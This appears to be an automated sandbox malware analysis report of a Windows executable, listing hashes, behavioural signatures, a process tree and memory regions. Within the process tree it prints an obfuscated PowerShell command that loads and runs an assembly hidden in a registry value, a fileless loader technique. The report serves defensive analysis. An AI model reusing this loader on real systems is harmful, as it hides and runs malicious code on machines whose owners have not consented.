Analysis

  • max time kernel
    150s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    16-05-2024 01:47

General

  • Target

    cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe

  • Size

    4.5MB

  • MD5

    133fda00a490e613f3a6c511c1c660eb

  • SHA1

    e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

  • SHA256

    cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

  • SHA512

    f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

  • SSDEEP

    24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{618df204-c18d-42ee-b037-9d2d4814101d}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3492
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:604
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:684
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
              • Modifies security service
              PID:756
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
              2⤵
                PID:816
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  3⤵
                    PID:1176
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  2⤵
                    PID:860
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {2DE9B01A-34BB-44A1-832B-B88E330A60EF} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3352
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3388
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:972
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:280
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:344
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1072
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1116
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                              2⤵
                                PID:2136
                              • C:\Windows\system32\sppsvc.exe
                                C:\Windows\system32\sppsvc.exe
                                2⤵
                                  PID:2128
                              • C:\Windows\system32\lsass.exe
                                C:\Windows\system32\lsass.exe
                                1⤵
                                  PID:492
                                • C:\Windows\system32\lsm.exe
                                  C:\Windows\system32\lsm.exe
                                  1⤵
                                    PID:500
                                  • C:\Windows\Explorer.EXE
                                    C:\Windows\Explorer.EXE
                                    1⤵
                                      PID:1208
                                      • C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe
                                        "C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe"
                                        2⤵
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2184
                                        • C:\Users\Admin\AppData\Local\Temp\$773dd258
                                          "C:\Users\Admin\AppData\Local\Temp\$773dd258"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3260

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • \Users\Admin\AppData\Local\Temp\$773dd258

                                      Filesize

                                      4.5MB

                                      MD5

                                      133fda00a490e613f3a6c511c1c660eb

                                      SHA1

                                      e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

                                      SHA256

                                      cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

                                      SHA512

                                      f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

                                    • memory/2184-26-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-4885-0x0000000074B40000-0x000000007522E000-memory.dmp

                                      Filesize

                                      6.9MB

                                    • memory/2184-3-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-4-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-7-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-20-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-22-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-18-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-34-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-16-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-52-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-64-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-66-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-63-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-58-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-56-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-54-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-44-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-60-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-50-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-48-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-47-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-30-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-39-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-36-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-28-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-40-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-5072-0x0000000001300000-0x0000000001354000-memory.dmp

                                      Filesize

                                      336KB

                                    • memory/2184-2-0x0000000006040000-0x0000000006280000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-14-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-12-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-10-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-8-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-42-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-32-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-4884-0x00000000005D0000-0x000000000061C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/2184-4883-0x0000000000630000-0x00000000006AE000-memory.dmp

                                      Filesize

                                      504KB

                                    • memory/2184-24-0x0000000006040000-0x000000000627A000-memory.dmp

                                      Filesize

                                      2.2MB

                                    • memory/2184-4886-0x0000000074B40000-0x000000007522E000-memory.dmp

                                      Filesize

                                      6.9MB

                                    • memory/2184-4887-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/2184-4888-0x0000000074B40000-0x000000007522E000-memory.dmp

                                      Filesize

                                      6.9MB

                                    • memory/2184-1-0x00000000013A0000-0x0000000001826000-memory.dmp

                                      Filesize

                                      4.5MB

                                    • memory/2184-0-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3388-4911-0x0000000019F60000-0x000000001A242000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/3388-4912-0x0000000000A90000-0x0000000000A98000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/3388-4913-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4914-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4915-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4916-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4917-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4918-0x000000001A350000-0x000000001A37A000-memory.dmp

                                      Filesize

                                      168KB

                                    • memory/3388-4921-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4910-0x000007FEF5FEE000-0x000007FEF5FEF000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3388-4967-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB

                                    • memory/3388-4927-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

                                      Filesize

                                      9.6MB